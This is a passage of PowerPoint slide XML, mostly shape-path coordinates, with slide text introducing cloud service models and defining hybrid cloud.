                  <a:lnTo>
                    <a:pt x="4213860" y="429767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4213860" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="429767"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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2005774" y="6695058"/>
            <a:ext cx="11289665" cy="12827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95"/>
              </a:spcBef>
            </a:pP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Hybrid</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1985"/>
              </a:spcBef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Hybrid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cloud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combination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any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two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more-cloud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deployment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models.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some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imes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ela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w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m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lti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clou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concept.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44844" y="306451"/>
            <a:ext cx="37668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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Models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58967" y="760476"/>
            <a:ext cx="5364480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869924" y="4791455"/>
            <a:ext cx="4516755" cy="2750185"/>
            <a:chOff x="5869924" y="4791455"/>
            <a:chExt cx="4516755" cy="2750185"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5869924" y="5012213"/>
              <a:ext cx="4516755" cy="2529205"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4516755" h="2529204">
                  <a:moveTo>
                    <a:pt x="2257567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2235215" y="5548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2225055" y="22193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2225055" y="1462373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172437" y="1462836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2120072" y="1464224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067960" y="1466538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016101" y="1469778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964495" y="1473944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913141" y="1479036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862041" y="1485053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811194" y="1491995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1760600" y="1499864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710259" y="1508658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1660171" y="1518378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1610336" y="1529024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560754" y="1540595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511425" y="1553092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1462348" y="1566515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413525" y="1580864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580278" y="870553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570476" y="864981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558625" y="863123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546774" y="864981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536971" y="870553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530899" y="885182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528875" y="898905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530899" y="910772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536971" y="919829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348628" y="1600549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299112" y="1615780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249985" y="1631872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201258" y="1648816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1152942" y="1666605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1105045" y="1685232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057578" y="1704690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010551" y="1724971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963973" y="1746069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917855" y="1767976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872206" y="1790684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827037" y="1814187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782357" y="1838478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738176" y="1863549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694504" y="1889392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="651351" y="1916002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608726" y="1943369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566641" y="1971488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525104" y="2000351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484126" y="2029951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443716" y="2060280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403885" y="2091332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364642" y="2123098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325997" y="2155572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287960" y="2188747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250541" y="2222616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213750" y="2257170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177597" y="2292403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142092" y="2328308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107244" y="2364877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73064" y="2402104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39562" y="2439981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6746" y="2478500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2505630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5228" y="2514594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17541" y="2517997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27398" y="2527677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39242" y="2529046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51063" y="2524890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60848" y="2517997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91738" y="2481161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123292" y="2444945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155497" y="2409353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188345" y="2374389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221824" y="2340057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255923" y="2306363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290631" y="2273310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325938" y="2240904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361833" y="2209148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398305" y="2178047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435343" y="2147605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472937" y="2117827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511076" y="2088718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549749" y="2060281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588945" y="2032521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628653" y="2005443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668863" y="1979051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709564" y="1953350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750745" y="1928343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792396" y="1904036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834505" y="1880433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877062" y="1857538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920056" y="1835356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963476" y="1813891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1007312" y="1793147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051552" y="1773130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096187" y="1753843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1141204" y="1735292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186594" y="1717479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1232345" y="1700411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278447" y="1684091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324890" y="1668523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1371661" y="1653713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1418751" y="1639665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466149" y="1626382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513844" y="1613870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1561824" y="1602134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1610081" y="1591176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658601" y="1581003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1707376" y="1571617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756394" y="1563025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805644" y="1555230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855115" y="1548236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904797" y="1542049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1954679" y="1536672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2004751" y="1532110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2055000" y="1528368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105418" y="1525449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155992" y="1523359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206712" y="1522102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257567" y="1521682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2309040" y="1522102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360330" y="1523359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411427" y="1525449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462322" y="1528368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513008" y="1532110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2563474" y="1536672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613713" y="1542049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2663715" y="1548236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2713472" y="1555230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762975" y="1563025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812214" y="1571617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861182" y="1581003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909870" y="1591176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2958268" y="1602134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3006368" y="1613870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3054161" y="1626382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101638" y="1639665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3148790" y="1653713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3195609" y="1668523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242086" y="1684091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288212" y="1700411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3333978" y="1717479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3379375" y="1735292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3424395" y="1753843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3469029" y="1773130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3513267" y="1793147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3557102" y="1813891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600524" y="1835356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3643524" y="1857538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3686095" y="1880433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3728226" y="1904036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769909" y="1928343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3811136" y="1953350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3851897" y="1979051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3892184" y="2005443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3931988" y="2032521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3971299" y="2060281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010111" y="2088718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4048412" y="2117827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4086195" y="2147605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4123451" y="2178047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4160171" y="2209148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196347" y="2240904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4231969" y="2273310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4267028" y="2306363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4301516" y="2340057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4335424" y="2374389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368744" y="2409353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4401466" y="2444945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4433581" y="2481161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4465081" y="2517997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4465081" y="2527776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4497593" y="2527776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4508388" y="2517997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4514461" y="2514594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4516485" y="2505630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4475568" y="2439403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4442038" y="2401031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4407809" y="2363387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4372895" y="2326472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4337306" y="2290290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4301056" y="2254842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4264156" y="2220130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226619" y="2186157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4188456" y="2152924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4149679" y="2120435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4110301" y="2088691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070334" y="2057695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4029789" y="2027448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988680" y="1997954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3947017" y="1969214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3904813" y="1941230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862080" y="1914005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818830" y="1887541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3775076" y="1861841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3730829" y="1836905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3686101" y="1812737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3640904" y="1789340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3595252" y="1766714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3549154" y="1744862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3502625" y="1723788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455675" y="1703491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3408317" y="1683976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360563" y="1665245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312425" y="1647298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3263915" y="1630140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4075572" y="919829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4081645" y="906593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4083669" y="895191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4081645" y="883789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4075572" y="870553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4060993" y="864981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4048474" y="863123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4035978" y="864981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4021470" y="870553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3199018" y="1610455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3151839" y="1594465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104090" y="1579387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3055807" y="1565222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3007022" y="1551970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2957768" y="1539631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908080" y="1528206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2857991" y="1517693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2807533" y="1508094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756741" y="1499409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2705648" y="1491637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654287" y="1484780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2602692" y="1478836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2550897" y="1473806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498934" y="1469690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446837" y="1466489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2394640" y="1464202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2342377" y="1462830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290079" y="1462373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290079" y="22193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279919" y="5548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225756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128004" y="4791455"/>
              <a:ext cx="3997960" cy="1405255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3997959" h="1405254">
                  <a:moveTo>
                    <a:pt x="531876" y="1059942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="527583" y="1011872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515226" y="966622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495554" y="924966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469303" y="887628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437248" y="855395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400126" y="829005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358698" y="809218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313715" y="796798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265938" y="792480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218147" y="796798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173164" y="809218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131737" y="829005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94615" y="855395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62560" y="887628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36309" y="924966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16637" y="966622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="1011872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1059942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="1108024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16637" y="1153274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36322" y="1194930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62560" y="1232268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94615" y="1264500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131737" y="1290891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173164" y="1310678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218147" y="1323098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265938" y="1327404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313715" y="1323098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358698" y="1310678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400126" y="1290891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437248" y="1264500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469303" y="1232268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495541" y="1194930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515226" y="1153274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527583" y="1108024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531876" y="1059942"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3997959" h="1405254">
                  <a:moveTo>
                    <a:pt x="2264664" y="266700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2260371" y="218757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248014" y="173634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228342" y="132080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202091" y="94869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170036" y="62725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132914" y="36410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091486" y="16687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046503" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998726" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1950935" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905952" y="16687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1864525" y="36410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827403" y="62725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795348" y="94869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769110" y="132080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749425" y="173634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737067" y="218757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732788" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737067" y="314655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749425" y="359778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769110" y="401320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795348" y="438543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827403" y="470687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1864525" y="497001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905952" y="516724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1950935" y="529107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998726" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046503" y="529107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091486" y="516724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132914" y="497001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170036" y="470687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2202091" y="438543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228342" y="401320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248014" y="359778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260371" y="314655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="266700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3997959" h="1405254">
                  <a:moveTo>
                    <a:pt x="3997452" y="1138428"/>
                  </a:moveTo>
